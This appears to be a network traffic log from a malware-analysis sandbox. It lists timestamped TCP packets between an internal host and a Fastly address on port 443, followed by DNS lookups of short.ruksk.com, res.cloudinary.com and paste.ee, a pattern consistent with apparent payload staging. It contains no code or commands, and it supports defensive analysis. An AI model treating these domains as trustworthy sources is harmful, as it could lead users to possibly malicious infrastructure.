                                                                                            Dec 10, 2024 06:58:30.617188931 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.617213964 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.617221117 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.617223024 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.617247105 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.617249966 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.617269993 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.617286921 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.617295980 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.626105070 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.626113892 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.626127958 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.626138926 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.626167059 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.626178026 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.626188040 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.632483006 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.632519007 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.632528067 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.632544041 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.632553101 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.632561922 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.632584095 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.632601976 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.639838934 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.639847994 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.639873028 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.639902115 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.639910936 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.639921904 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.647253036 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.647275925 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.647315025 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.647322893 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.647334099 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.653395891 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.653414965 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.653449059 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.653455019 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.653465033 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.660583973 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.660609007 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.660641909 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.660650015 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.660660982 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.803211927 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.803251028 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.803298950 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.803328037 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.803343058 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.803343058 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:30.809073925 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.809082031 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.809117079 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.809135914 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:30.809137106 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.591705084 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.591747046 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.591747046 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.591875076 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.599114895 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.599139929 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.599169970 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.599176884 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.599188089 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.599219084 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.606128931 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.606152058 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.606190920 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.606195927 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.606205940 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.606352091 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.613843918 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.613863945 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.613924980 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.613930941 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.613960981 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.621011972 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.621036053 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.621067047 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.621073961 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.621083975 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.621134996 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.763601065 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.763639927 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.763680935 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.763705015 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.763716936 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.770128965 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.770153999 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.770183086 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.770189047 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.770198107 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.776673079 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.776691914 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.776727915 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.776741028 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.776748896 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.776794910 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.784207106 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.784229040 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.784260988 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.784271955 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.784281015 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.789745092 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.791944027 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.791965008 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.791991949 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.791999102 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.792009115 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.794409990 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.798712969 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.798736095 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.798795938 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.798805952 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.798868895 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.806029081 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.806055069 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.806113958 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.806121111 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.806152105 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.806152105 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.812597990 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.812623024 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.812669039 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.812676907 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.812688112 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.955621004 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.955648899 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.955693960 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.955724955 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.955738068 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.955746889 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.962100029 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.962106943 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.962131023 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.962138891 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.962141037 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.962150097 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.962169886 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.962176085 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.962188959 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.962198019 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.962208986 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.969630957 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.969659090 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.969669104 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.969682932 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.969682932 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.969696045 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.969722986 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.976151943 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.976176023 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.976207972 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.976208925 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.976227999 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.976236105 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.976263046 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.983563900 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.983584881 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.983623981 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.983629942 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.983644009 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.983671904 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.990633965 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.990658045 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.990704060 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.990712881 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.990721941 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.998054028 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.998078108 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.998110056 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:31.998116970 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:31.998127937 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.005542994 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.005562067 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.005597115 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.005603075 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.005611897 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.147417068 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.147450924 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.147538900 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.147553921 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.148734093 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.154089928 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.154098988 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.154141903 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.154154062 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.154170036 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.154177904 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.154273987 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.154320955 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.161585093 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.161597013 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.161637068 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.161647081 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.161669970 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.161689043 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.161703110 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.168150902 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.168159962 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.168178082 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.168204069 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.168222904 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.168237925 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.168250084 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.168250084 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.168250084 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.175503016 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.175522089 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.175551891 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.175566912 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.175581932 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.175590992 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.175618887 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.182614088 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.182637930 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.182677031 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.182688951 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.182698965 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.190077066 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.190114975 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.190155029 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.190170050 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.190200090 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.192517042 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:32.197509050 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.197530031 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:32.197572947 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.129208088 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.129220963 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.129241943 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.136468887 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.136487961 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.136526108 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.136533976 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.136543036 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.137515068 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.137562990 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.137568951 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.137578964 CET44349174151.101.1.137192.168.2.22
                                                                                            Dec 10, 2024 06:58:33.137620926 CET49174443192.168.2.22151.101.1.137
                                                                                            Dec 10, 2024 06:58:33.138019085 CET49174443192.168.2.22151.101.1.137
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 10, 2024 06:57:41.772686958 CET | 192.168.2.22 | 8.8.8.8 | 0x5491 | Standard query (0) | short.ruksk.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:57:45.956525087 CET | 192.168.2.22 | 8.8.8.8 | 0x64a5 | Standard query (0) | short.ruksk.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:57:46.208971024 CET | 192.168.2.22 | 8.8.8.8 | 0x64a5 | Standard query (0) | short.ruksk.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:57:46.342982054 CET | 192.168.2.22 | 8.8.8.8 | 0x64a5 | Standard query (0) | short.ruksk.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:57:46.477063894 CET | 192.168.2.22 | 8.8.8.8 | 0x64a5 | Standard query (0) | short.ruksk.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:04.919166088 CET | 192.168.2.22 | 8.8.8.8 | 0x973f | Standard query (0) | res.cloudinary.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:05.276091099 CET | 192.168.2.22 | 8.8.8.8 | 0x82fb | Standard query (0) | res.cloudinary.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:08.431745052 CET | 192.168.2.22 | 8.8.8.8 | 0xea46 | Standard query (0) | short.ruksk.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:08.699527979 CET | 192.168.2.22 | 8.8.8.8 | 0xea46 | Standard query (0) | short.ruksk.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:09.041049004 CET | 192.168.2.22 | 8.8.8.8 | 0xea46 | Standard query (0) | short.ruksk.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:09.175596952 CET | 192.168.2.22 | 8.8.8.8 | 0xea46 | Standard query (0) | short.ruksk.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:27.088314056 CET | 192.168.2.22 | 8.8.8.8 | 0x159c | Standard query (0) | res.cloudinary.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:27.506633043 CET | 192.168.2.22 | 8.8.8.8 | 0xdd08 | Standard query (0) | res.cloudinary.com | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:28.255542040 CET | 192.168.2.22 | 8.8.8.8 | 0x323b | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:28.493628025 CET | 192.168.2.22 | 8.8.8.8 | 0x323b | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:28.627490997 CET | 192.168.2.22 | 8.8.8.8 | 0x323b | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:28.761231899 CET | 192.168.2.22 | 8.8.8.8 | 0x323b | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:28.999042034 CET | 192.168.2.22 | 8.8.8.8 | 0x323b | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:46.072819948 CET | 192.168.2.22 | 8.8.8.8 | 0xa1cd | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:46.206574917 CET | 192.168.2.22 | 8.8.8.8 | 0xa1cd | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:46.341187954 CET | 192.168.2.22 | 8.8.8.8 | 0xa1cd | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:46.474889040 CET | 192.168.2.22 | 8.8.8.8 | 0xa1cd | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:46.608628035 CET | 192.168.2.22 | 8.8.8.8 | 0xa1cd | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 10, 2024 06:57:41.907732964 CET | 8.8.8.8 | 192.168.2.22 | 0x5491 | No error (0) | short.ruksk.com | | 54.150.207.131 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:57:46.175134897 CET | 8.8.8.8 | 192.168.2.22 | 0x64a5 | No error (0) | short.ruksk.com | | 54.150.207.131 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:57:46.342581987 CET | 8.8.8.8 | 192.168.2.22 | 0x64a5 | No error (0) | short.ruksk.com | | 54.150.207.131 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:57:46.476732969 CET | 8.8.8.8 | 192.168.2.22 | 0x64a5 | No error (0) | short.ruksk.com | | 54.150.207.131 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:57:46.610750914 CET | 8.8.8.8 | 192.168.2.22 | 0x64a5 | No error (0) | short.ruksk.com | | 54.150.207.131 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:05.270452976 CET | 8.8.8.8 | 192.168.2.22 | 0x973f | No error (0) | res.cloudinary.com | resc.cloudinary.com.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 06:58:05.423610926 CET | 8.8.8.8 | 192.168.2.22 | 0x82fb | No error (0) | res.cloudinary.com | cloudinary.map.fastly.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 06:58:05.423610926 CET | 8.8.8.8 | 192.168.2.22 | 0x82fb | No error (0) | cloudinary.map.fastly.net | | 151.101.65.137 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:05.423610926 CET | 8.8.8.8 | 192.168.2.22 | 0x82fb | No error (0) | cloudinary.map.fastly.net | | 151.101.129.137 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:05.423610926 CET | 8.8.8.8 | 192.168.2.22 | 0x82fb | No error (0) | cloudinary.map.fastly.net | | 151.101.1.137 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:05.423610926 CET | 8.8.8.8 | 192.168.2.22 | 0x82fb | No error (0) | cloudinary.map.fastly.net | | 151.101.193.137 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:08.699264050 CET | 8.8.8.8 | 192.168.2.22 | 0xea46 | No error (0) | short.ruksk.com | | 54.150.207.131 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:09.040522099 CET | 8.8.8.8 | 192.168.2.22 | 0xea46 | No error (0) | short.ruksk.com | | 54.150.207.131 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:09.174835920 CET | 8.8.8.8 | 192.168.2.22 | 0xea46 | No error (0) | short.ruksk.com | | 54.150.207.131 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:09.309245110 CET | 8.8.8.8 | 192.168.2.22 | 0xea46 | No error (0) | short.ruksk.com | | 54.150.207.131 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:27.234561920 CET | 8.8.8.8 | 192.168.2.22 | 0x159c | No error (0) | res.cloudinary.com | cloudinary.map.fastly.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 10, 2024 06:58:27.234561920 CET | 8.8.8.8 | 192.168.2.22 | 0x159c | No error (0) | cloudinary.map.fastly.net | | 151.101.1.137 | A (IP address) | IN (0x0001) | false
Dec 10, 2024 06:58:27.234561920 CET | 8.8.8.8 | 192.168.2.22 | 0x159c | No error (0) | cloudinary.map.fastly.net | | 151.101.129.137 | A (IP address) | IN (0x0001) | false
